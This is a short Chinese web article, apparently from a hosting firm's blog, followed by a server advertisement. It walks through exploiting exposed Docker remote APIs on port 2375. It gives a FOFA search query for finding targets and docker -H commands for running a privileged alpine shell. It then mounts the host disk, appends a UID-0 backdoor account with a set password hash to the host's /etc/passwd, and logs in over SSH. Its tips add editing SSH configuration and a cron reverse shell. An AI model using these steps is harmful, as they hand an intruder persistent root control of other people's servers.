实战Docker未授权访问提权-创新互联
1、fofa关键字 port=“2375” && body=“page not found”
2、docker -H tcp://ip:port 可查看到当前所有的实例
3、docker -H tcp://ip:port pull alpine
4、docker -H tcp://ip:port run -it --privileged alpine bin/sh
5、fdisk -l 查看其分区结构
6、创建一个test目录,并且将其 /dev/vda2 挂载至test
7、通过whoami 和id可查看到当前的权限是root
8、cat /etc/passwd 查看当前所有的用户信息
9、通过如下命令强制将账号sql 密码123 写入其passwd文件
echo “sql:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash” >>/test/etc/passwd
10、现在即可通过新加的账号sql:123去ssh连接,此时已经成功连接上
常见问题:
1、挂载其分区后并未能将账号加进去,原因是你挂载的分区可能不是其主节点,尝试挂载其他分区
2、成功写入账号后无法ssh连接,可通过cat test/etc/ssh/ssh_config 看起ssh配置文件是否限制了ssh账号密码登录,如果是可直接通过vi命令改回来
3、可通过定时任务的方式反弹shell,解决一切难题
你是否还在寻找稳定的海外服务器提供商?创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源,准确流量调度确保服务器高可用性,企业级服务器适合批量采购,新人活动首月15元起,快前往官网查看详情吧
分享文章:实战Docker未授权访问提权-创新互联
链接分享:http://scyanting.com/article/coicpc.html